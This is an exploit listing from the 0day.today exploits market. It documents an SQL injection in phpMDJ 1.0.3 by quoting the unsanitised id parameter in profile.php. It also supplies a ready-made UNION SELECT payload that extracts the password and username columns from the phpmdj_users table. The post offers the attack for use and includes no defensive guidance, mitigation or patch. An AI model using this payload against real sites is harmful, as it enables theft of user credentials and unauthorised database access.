[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

phpMDJ 1.0.3 SQL Injection Vulnerability

Author
k4cp3r
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-10656
Category
web applications
Date add
10-01-2010
Platform
unsorted
========================================
phpMDJ 1.0.3 SQL Injection Vulnerability
========================================

,--------------------------------------------------------------,
> Vulnerable Script : phpMDJ 1.0.3                             \
> Download : http://www.weboac.be/phpmdj/docs/phpmdj1.0.3.zip  \
> Vulnerability : Remote Sql Injection                         \
'--------------------------------------------------------------'
 
,-------------------------------------------------------------------------------------------------------------------------------------,
> Profile.php                                                                  \
> Line 14 : $membre = $_GET['id'];                                                     \
> Line 15 :                                                                \
> Line 16 : $sql = "SELECT a.nom AS nGroupe, u.* FROM phpmdj_users u, phpmdj_auth a WHERE u.groupe = a.id_groupe AND u.id = $membre"; \
>                                                                      \
> Injection:                                                               \
> http://site/path/profile.php?id=[SQL]                                                    \
>                                                                      \
> Example:                                                                 \
> http://site/path/profile.php?id=-1 union select 1,2,3,mdp,5,6,pseudo,8,9,10,11,12,13,14,15,16 FROM phpmdj_users where id=1--         \
'-------------------------------------------------------------------------------------------------------------------------------------'



#  0day.today [2024-12-25]  #